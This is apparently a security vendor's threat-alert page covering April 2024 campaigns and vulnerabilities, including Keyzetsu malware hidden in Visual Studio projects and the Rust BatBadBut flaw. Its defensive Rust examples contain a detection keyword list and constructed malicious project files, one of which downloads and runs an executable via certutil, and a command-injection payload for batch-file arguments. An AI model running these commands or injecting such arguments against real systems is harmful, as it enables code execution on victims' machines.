Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


AI-Powered Malware – The Rise of Scripting Automation in Malware Attacks

15-Apr-2024
Label: Trends
Threat Level: Medium

A recent campaign against German organizations illustrates a rising trend in the threat landscape: the use of generative AI to write malicious scripts.

The attack, attributed to threat actor TA547, featured the deployment of the Rhadamanthys information stealer. TA547, also known as Scully Spider, has a history of malware dissemination and has recently incorporated Rhadamanthys, enhancing its data collection capabilities. This marks the first known instance of Rhadamanthys within TA547’s operations.

The PowerShell script used in the campaign had distinctive characteristics, notably a descriptive, grammatically correct comment above each component of the script, a style typical of code produced by a large language model. This has not been definitively confirmed and the indicator is circumstantial, but it suggests that TA547 used generative AI to develop the script.

This incident underscores the emerging trend of threat actors using AI to produce attack tooling faster and at scale, which adds to the burden on defenders. Note that how the script was written does not change what it does: the loader's behaviour, and detections that key on that behaviour, are the same whether a human or a model produced the code.

Microsoft Patches Two Zero-Days Exploited for Malware Delivery

15-Apr-2024
Label: Vulnerability
Threat Level: Medium

Microsoft’s April 2024 Patch Tuesday updates address around 150 vulnerabilities, including two Windows issues that appear to have been exploited in the wild before patches were available.

Fortinet Patches Critical RCE in FortiClientLinux

15-Apr-2024
Label: Vulnerability
Threat Level: Medium

Fortinet issued critical security patches for a flaw in FortiClientLinux that allows attackers to execute arbitrary code.

Novel Method to Deceive Developers Found in Open-Source Supply Chain Attack

15-Apr-2024
Label: Trends
Threat Level: Medium

Cybercriminals increasingly target developers by planting malicious libraries on package registries such as PyPI and npm, inserting backdoors into shared code snippets, and abusing GitHub’s reach. Any of these can become a supply chain compromise once the poisoned code reaches a developer’s build.

Recently, attackers have been distributing Keyzetsu malware through Visual Studio projects hosted on GitHub. They gamed GitHub search by creating repositories with enticing names and inflating their popularity with fake stars, so the repositories look legitimate and widely used and victims download the harmful code.

The malicious code is embedded in the Visual Studio project files themselves, so it executes as soon as the victim builds the project; nothing that looks like a payload has to be opened or run by hand. The malware checks the victim’s location and tailors its payload accordingly, avoiding targets in Russia. In the current campaign the payload is a large executable that resembles the “Keyzetsu clipper”, a clipper that targets cryptocurrency wallets by swapping wallet addresses copied to the clipboard.

The attackers also use GitHub Actions to commit trivial changes to the repositories automatically and frequently, so they rank highly when users sort search results by most recently updated, making these malicious projects more likely to be stumbled upon.
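As an added example for the Keyzetsu item above (it is not code from the CyberProof page or from the Checkmarx research it summarises), the following hunts MSBuild project files for build-time execution. MSBuild runs the commands in `<PreBuildEvent>`, `<PreLinkEvent>` and `<PostBuildEvent>` and the `Command` attribute of `<Exec>` tasks whenever a project is built, so those are the places to look in a cloned `.vcxproj` or `.csproj` before pressing Build. The three project files and the indicator list are constructed for the demonstration and are not published detection content or the real Keyzetsu project files.

```rust
// Added example: a build-time execution hunt for MSBuild project files.
// Project files below are constructed; the indicator list is an assumption.

/// Substrings that rarely belong in a legitimate build step (assumed list).
const INDICATORS: &[&str] = &[
    "powershell", "pwsh", "-enc", "-encodedcommand", "frombase64string",
    "invoke-webrequest", "iwr ", "iex ", "invoke-expression", "downloadstring",
    "certutil", "bitsadmin", "mshta", "rundll32", "regsvr32",
    "curl ", "wget ", "http://", "https://",
];

#[derive(Debug, PartialEq)]
pub struct Finding {
    pub element: String,
    pub command: String,
    pub indicators: Vec<String>,
}

/// Bodies of every `<name ...>...</name>` element. A plain text scan, not an
/// XML parser, so it also tolerates half-broken or hand-edited project files.
fn element_bodies<'a>(xml: &'a str, name: &str) -> Vec<&'a str> {
    let (open, close) = (format!("<{name}"), format!("</{name}>"));
    let mut out = Vec::new();
    let mut rest = xml;
    while let Some(s) = rest.find(&open) {
        let after = &rest[s + open.len()..];
        // Require a tag boundary so "<Command" matches <Command> but not <CommandLine>.
        let is_tag = after.starts_with('>') || after.starts_with(char::is_whitespace);
        let Some(gt) = after.find('>') else { break };
        let body = &after[gt + 1..];
        if !is_tag || after[..gt].ends_with('/') {
            rest = body; // prefix match on another element, or a self-closing tag
            continue;
        }
        match body.find(&close) {
            Some(e) => {
                out.push(&body[..e]);
                rest = &body[e + close.len()..];
            }
            None => break,
        }
    }
    out
}

/// The Command="..." attribute of every <Exec> task.
fn exec_commands(xml: &str) -> Vec<&str> {
    let mut out = Vec::new();
    let mut rest = xml;
    while let Some(s) = rest.find("<Exec") {
        rest = &rest[s + "<Exec".len()..];
        // A "-delimited attribute value cannot contain a raw ", so the next " ends it.
        if let Some(a) = rest.find("Command=\"") {
            let value = &rest[a + "Command=\"".len()..];
            if let Some(q) = value.find('"') {
                out.push(&value[..q]);
                rest = &value[q..];
            }
        }
    }
    out
}

/// Undo the XML escaping used inside MSBuild attribute and element text.
fn xml_unescape(s: &str) -> String {
    s.replace("&quot;", "\"").replace("&lt;", "<").replace("&gt;", ">").replace("&amp;", "&")
}

fn matched_indicators(command: &str) -> Vec<String> {
    let lower = command.to_ascii_lowercase();
    INDICATORS.iter().filter(|i| lower.contains(*i)).map(|i| i.trim().to_string()).collect()
}

/// Scan one project file and report build-time commands carrying indicators.
/// Build events hold a nested <Command> in .vcxproj files and bare text in
/// .csproj files; <Exec> tasks carry the command as an attribute.
pub fn scan_project(xml: &str) -> Vec<Finding> {
    let mut commands: Vec<(&str, String)> = Vec::new();
    for event in ["PreBuildEvent", "PreLinkEvent", "PostBuildEvent"] {
        for body in element_bodies(xml, event) {
            let nested = element_bodies(body, "Command");
            let texts = if nested.is_empty() { vec![body] } else { nested };
            commands.extend(texts.into_iter().map(|t| (event, xml_unescape(t))));
        }
    }
    commands.extend(exec_commands(xml).into_iter().map(|c| ("Exec", xml_unescape(c))));
    commands
        .into_iter()
        .filter_map(|(element, command)| {
            let indicators = matched_indicators(&command);
            (!indicators.is_empty()).then(|| Finding {
                element: element.to_string(),
                command: command.trim().to_string(),
                indicators,
            })
        })
        .collect()
}

// Constructed sample project files (not taken from any real repository).
pub const BENIGN_VCXPROJ: &str = r#"<Project>
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>xcopy /y "$(SolutionDir)assets\*.png" "$(OutDir)"</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>"#;

pub const MALICIOUS_VCXPROJ: &str = r#"<Project>
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>powershell -nop -w hidden -EncodedCommand QUFBQUFBQUFBQQ==</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>"#;

pub const MALICIOUS_CSPROJ: &str = r#"<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="certutil -urlcache -split -f http://198.51.100.7/s.exe %TEMP%\s.exe &amp;&amp; %TEMP%\s.exe" />
  </Target>
</Project>"#;

fn main() {
    let samples = [("benign.vcxproj", BENIGN_VCXPROJ), ("evil.vcxproj", MALICIOUS_VCXPROJ), ("evil.csproj", MALICIOUS_CSPROJ)];
    for (name, xml) in samples {
        for f in scan_project(xml) {
            println!("{name}: <{}> {:?} :: {}", f.element, f.indicators, f.command);
        }
    }
}
```

Run it over every `*.vcxproj`, `*.csproj` and `Directory.Build.props` in a freshly cloned repository before the first build; a hit does not prove malice, but a pre-build event that launches PowerShell with an encoded command or pulls a binary with certutil should be read before the build is allowed to run.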

Separately this week, a critical vulnerability in the Rust standard library, CVE-2024-24576 (“BatBadBut”), came to light. It affects programs that invoke Windows batch files (.bat or .cmd) with arguments that are not trusted. Windows has no way to execute a batch file directly, so CreateProcess silently runs it through cmd.exe, and cmd.exe parses the command line by rules that differ from the escaping the standard library applied to the arguments. An attacker who controls an argument can therefore inject additional cmd.exe commands into software that spawns a batch file this way.

CVE-2024-24576 affects all Rust versions before 1.77.2, which ships the fix. The researcher who reported it notes that the same cmd.exe behaviour affects other languages’ process-spawning APIs and that the impact depends on how each runtime escapes arguments. Since not every language has remedied the issue, developers should treat arguments passed to batch files on Windows as untrusted input and avoid invoking batch files with user-controlled arguments where possible.

Zero-Day Vulnerability in Palo Alto’s Pan-OS Under Active Exploitation

15-Apr-2024
Label: Vulnerability
Threat Level: Medium

A critical vulnerability in Palo Alto Networks’ PAN-OS software, tracked as CVE-2024-3400, is under active exploitation and has been abused since at least late March by a suspected state-backed actor. It is a command injection flaw in the GlobalProtect feature of PAN-OS that lets an unauthenticated remote attacker execute arbitrary code with root privileges on the firewall. It affects PAN-OS 10.2, 11.0 and 11.1 firewalls that have a GlobalProtect gateway or portal configured.

‘BatBadBut’ Rust Flaw Exposes Windows Systems to Attacks

15-Apr-2024
Label: Vulnerability
Threat Level: Medium

A critical security flaw was identified in the Rust programming language’s standard library, specifically in how it handles arguments for batch files on Windows systems. This vulnerability, CVE-2024-24576 (CVSS 10.0), arises because the Command API escaped arguments according to the rules of the Windows C runtime even when the target was a batch file, which Windows runs through cmd.exe; cmd.exe does not honour those escapes, so the quoting does not protect the command line. As a result, an attacker able to control such an argument (for example one containing a quote followed by an ampersand) can execute arbitrary shell commands, compromising the system.
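The following is an added example that serves both BatBadBut items on this page; it is not code from the CyberProof page or from the Rust project. It shows three things: the C runtime style quoting that `std::process::Command` applied to every argument before Rust 1.77.2, a small model of how cmd.exe parses the `cmd.exe /c "..."` line Windows builds when a .bat file is the target, and a deliberately conservative escaper that, like the 1.77.2 fix, returns an error instead of passing along an argument it cannot make safe. The escaper is this page’s own policy, not the algorithm std adopted. The batch file name and payload strings are constructed, and the cmd.exe model covers only quote toggling, `^` escapes and the `&|<>` separators.

```rust
// Added example: why CRT-style quoting fails for batch files, and a strict
// alternative. Payloads and the script name are constructed.

use std::iter::repeat;

/// Quote one argument the way the Windows C runtime expects
/// (CommandLineToArgvW rules): wrap in quotes, `"` becomes `\"`, and
/// backslashes are doubled only where they precede a quote.
fn crt_quote(arg: &str) -> String {
    let mut out = String::from("\"");
    let mut backslashes = 0;
    for c in arg.chars() {
        match c {
            '\\' => backslashes += 1,
            '"' => {
                out.extend(repeat('\\').take(backslashes * 2 + 1));
                out.push('"');
                backslashes = 0;
            }
            _ => {
                out.extend(repeat('\\').take(backslashes));
                out.push(c);
                backslashes = 0;
            }
        }
    }
    out.extend(repeat('\\').take(backslashes * 2));
    out.push('"');
    out
}

/// Command line handed to cmd.exe for a batch-file target, in the layout
/// std used: `cmd.exe /c "<quoted script> <quoted args...>"`.
fn bat_command_line(script: &str, quoted_args: &[String]) -> String {
    let mut line = format!("cmd.exe /c \"\"{script}\"");
    for a in quoted_args {
        line.push(' ');
        line.push_str(a);
    }
    line.push('"');
    line
}

/// Model of cmd.exe parsing the text after `/c`: with more than two quotes
/// present it drops the first and last quote (documented in `cmd /?`), then
/// toggles quote mode on every `"`, honours `^` only outside quotes, and
/// treats `&`, `|`, `<`, `>` outside quotes as separators or redirections.
/// Returns the separators cmd.exe would act on; a safe line yields none.
fn cmd_unquoted_metachars(cmdline: &str) -> Vec<char> {
    let rest = cmdline.split_once("/c ").map_or(cmdline, |(_, r)| r);
    let rest = if rest.matches('"').count() > 2 {
        rest.strip_prefix('"').and_then(|r| r.strip_suffix('"')).unwrap_or(rest)
    } else {
        rest
    };
    let (mut hits, mut in_quotes, mut escaped) = (Vec::new(), false, false);
    for c in rest.chars() {
        if escaped {
            escaped = false;
            continue;
        }
        match c {
            '"' => in_quotes = !in_quotes,
            '^' if !in_quotes => escaped = true,
            '&' | '|' | '<' | '>' if !in_quotes => hits.push(c),
            _ => {}
        }
    }
    hits
}

#[derive(Debug, PartialEq)]
enum BatArgError { Quote, Percent, Bang, Newline, Nul }

/// Conservative escaping for an argument bound for a batch file (an added
/// policy, not std's 1.77.2 algorithm). Wrapping in `"..."` makes `&|<>^()`
/// inert for cmd.exe; characters that quoting cannot neutralise are rejected,
/// mirroring the 1.77.2 decision to fail with InvalidInput.
fn safe_bat_arg(arg: &str) -> Result<String, BatArgError> {
    for c in arg.chars() {
        match c {
            '"' => return Err(BatArgError::Quote),     // toggles cmd.exe quote mode; `\"` does not protect it
            '%' => return Err(BatArgError::Percent),   // %VAR% expands even inside quotes
            '!' => return Err(BatArgError::Bang),      // !VAR! expands when delayed expansion is enabled
            '\r' | '\n' => return Err(BatArgError::Newline), // terminates the command
            '\0' => return Err(BatArgError::Nul),
            _ => {}
        }
    }
    // Double a trailing backslash run so the program the batch file launches
    // (parsing with CRT rules) does not read `\"` as a literal quote.
    let trailing = arg.chars().rev().take_while(|&c| c == '\\').count();
    let mut out = String::with_capacity(arg.len() + trailing + 2);
    out.push('"');
    out.push_str(arg);
    out.extend(repeat('\\').take(trailing));
    out.push('"');
    Ok(out)
}

fn main() {
    let payload = "\"&calc.exe"; // constructed attacker-controlled argument
    let vulnerable = bat_command_line("test.bat", &[crt_quote(payload)]);
    println!("pre-1.77.2 line : {vulnerable}");
    println!("cmd.exe acts on : {:?}", cmd_unquoted_metachars(&vulnerable));
    println!("hardened        : {:?}", safe_bat_arg(payload));
    let benign = bat_command_line("test.bat", &[safe_bat_arg("a&b|c").unwrap()]);
    println!("benign line     : {benign} -> {:?}", cmd_unquoted_metachars(&benign));
}
```

The model makes the failure visible: CRT quoting turns `"&calc.exe` into `"\"&calc.exe"`, but cmd.exe does not treat `\` as an escape, so the second `"` closes quote mode and the `&` that follows becomes a command separator. Quoting alone only protects the cmd.exe command line; if the batch file itself expands `%~1` (quotes stripped) into another command, the injection moves into the script, which is why rejecting unsafe arguments, or not spawning batch files with untrusted input at all, is the safer design.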
